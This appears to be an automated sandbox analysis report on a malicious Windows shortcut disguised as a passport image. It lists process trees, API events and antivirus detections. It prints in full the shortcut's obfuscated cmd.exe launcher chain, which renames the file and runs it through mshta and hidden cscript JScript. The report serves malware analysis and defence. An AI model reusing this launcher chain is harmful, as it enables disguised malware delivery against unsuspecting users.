Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 13, 2021, 6 p.m.	July 13, 2021, 6:03 p.m.

Size	629.1KB
Type	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Mon Feb 12 21:29:00 2018, mtime=Mon Feb 12 21:29:00 2018, atime=Mon Feb 12 21:29:00 2018, length=345088, window=hidenormalshowminimized
MD5	`041cc53c6152bc5ac0ada6fb7cb12bb4`
SHA256	`b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554`
CRC32	`54CDBD97`
ssdeep	`12288:0v2z5cBrqDwCZCFAOmjz2DDs/JqxUQCIrGUh/jo:0v8GBrSJsyx/7GNq`
Yara	Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xXqvbTYfJzOcV" C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
2444
- cmd.exe "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
  2584
  - cmd.exe cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
    2668
    - NETSTAT.EXE netstat -x
      2732
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "
      2776
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd""
      2812
    - cmd.exe C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
      2864
      - HOSTNAME.EXE hostname
        2908
      - chcp.com chcp /?
        2956
      - cmd.exe cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"
        3000
        
        mshta.exe mShTa "C:\Users\test22\img.dat"
        3044
        
        cscript.exe "C:\Windows\System32\cscript.exe" "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log"
        2052
        
        cscript.exe "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
        2612

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 13, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 13, 2021, 6:01 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (23 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 13, 2021, 6 p.m.	buffer: 'chgport' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: hello console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: stop console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: continue console_handle: 0x00000007	1	1
WriteConsoleA July 13, 2021, 6 p.m.	buffer: Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-b] [-e] [-f] [-n] [-o] [-p proto] [-r] [-s] [-t] [interval] -a Displays all connections and listening ports. -b Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions. -e Displays Ethernet statistics. This may be combined with the -s option. -f Displays Fully Qualified Domain Names (FQDN) for foreign addresses. -n Displays addresses and port numbers in numerical form. -o Displays the owning process ID associated with each connection. -p proto Shows connections for the protocol specified by proto; proto may be any of: TCP, UDP, TCPv6, or UDPv6. If used with the -s option to display per-protocol statistics, proto may be any of: IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, and UDPv6; the -p option may be used to specify a subset of the default. -t Displays the current connection offload state. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once. console_handle: 0x0000000b	1	1
WriteConsoleA July 13, 2021, 6 p.m.	buffer: test22-PC console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: Displays or sets the active code page nu console_handle: 0x00000013	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: mber. CHCP [nnn] nnn Specifies console_handle: 0x00000013	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: a code page number. Type CHCP withou console_handle: 0x00000013	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: t a parameter to display the active code console_handle: 0x00000013	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: page number. console_handle: 0x00000013	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: do exit console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: 1 file(s) moved. console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: test5 console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: dEL console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp\test.cmD" console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: mShTa console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: "C:\Users\test22\img.dat" console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: Microsoft (R) Windows Script Host 버전 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW July 13, 2021, 6 p.m.	buffer: Microsoft (R) Windows Script Host 버전 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 13, 2021, 6 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74362000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f93000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 2052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74362000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 2052 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 2612 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74362000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe
file	C:\Users\test22\AppData\Local\Temp\test.cmD

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk

Creates a suspicious process (6 events)

cmdline	cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo \| set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub.k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline	"C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo \| set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub.k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline	mShTa "C:\Users\test22\img.dat"
cmdline	C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub.k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub.k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo "
cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd""

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe

Executes one or more WMI queries (2 events)

wmi	SELECT UUID FROM Win32_ComputerSystemProduct
wmi	SELECT Version FROM Win32_OperatingSystem

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 13, 2021, 6 p.m.	show_type: 0 filepath_r: CscRipt parameters: "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log" filepath: CscRipt	1	1	0
ShellExecuteExW July 13, 2021, 6 p.m.	show_type: 0 filepath_r: Cscript parameters: "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp" filepath: Cscript	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 13, 2021, 6 p.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03bd0000 process_handle: 0xffffffff	1	0	0

Moves the original executable to a new location (1 event)

Time & API	Arguments	Status	Return	Repeated
MoveFileWithProgressW July 13, 2021, 6 p.m.	newfilepath_r: C:\Users\test22\img.dat flags: 3 oldfilepath_r: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk newfilepath: C:\Users\test22\img.dat oldfilepath: C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	cmd /c " echo do exit & mOvE /y "Doub.k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"
cmdline	cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo \| set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub.k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline	"C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo \| set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub.k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
cmdline	netstat -x
cmdline	C:\Windows\system32\cmd.exe /C "(if not exist "Doub.k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub.k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub.k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
cmdline	chcp /?

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT UUID FROM Win32_ComputerSystemProduct

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

FireEye	Heur.BZC.YAX.Pantera.10.174A1AAB
ALYac	Heur.BZC.YAX.Pantera.10.174A1AAB
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Pantera.10.174A1AAB
MicroWorld-eScan	Heur.BZC.YAX.Pantera.10.174A1AAB
Ad-Aware	Heur.BZC.YAX.Pantera.10.174A1AAB
Emsisoft	Heur.BZC.YAX.Pantera.10.174A1AAB (B)
SentinelOne	Static AI - Suspicious LNK
GData	Heur.BZC.YAX.Pantera.10.174A1AAB
MAX	malware (ai score=82)
Arcabit	Heur.BZC.YAX.Pantera.10.174A1AAB
Microsoft	Trojan:Script/Wacatac.B!ml
VBA32	Trojan.Link.Crafted
Panda	JS/BondatN.gen

One or more non-whitelisted processes were created (3 events)

parent_process	cscript.exe	martian_process	DoublesidePassport.jpg
parent_process	cscript.exe	martian_process	Cscript "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
parent_process	cscript.exe	martian_process	"C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2444 resumed a thread in remote process 2584
NtResumeThread July 13, 2021, 6 p.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 2584	1	0	0

Collects information on the system (ipconfig, netstat, systeminfo) (1 event)

cmdline

cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""

DoublesidePassport.jpg.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All